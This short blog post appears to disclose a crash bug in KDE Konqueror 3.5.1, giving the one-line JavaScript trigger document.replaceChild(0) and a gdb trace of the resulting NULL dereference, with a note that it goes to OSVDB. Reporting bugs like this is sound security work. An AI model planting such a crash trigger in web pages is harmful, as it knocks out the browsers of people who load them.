The following bug was tested on KDE 3.5.1 on a current Gentoo Linux system. Calling the replaceChild() method on almost any DOM element can result in a NULL dereference.
document.replaceChild(0);
Demonstration
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1231504512 (LWP 11418)]
0xb6552ca0 in DOM::Node::replaceChild () from /usr/kde/3.5/lib/libkhtml.so.4
(gdb) display /i $pc
1: x/i $pc 0xb6552ca0 <_ZN3DOM4Node12replaceChildERKS0_S2_+110>: testb $0x8,0x22(%edx)
(gdb) i r $edx
edx 0x0 0
This bug will be added to the OSVDB:
KDE Konqueror replaceChild() NULL Dereference
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment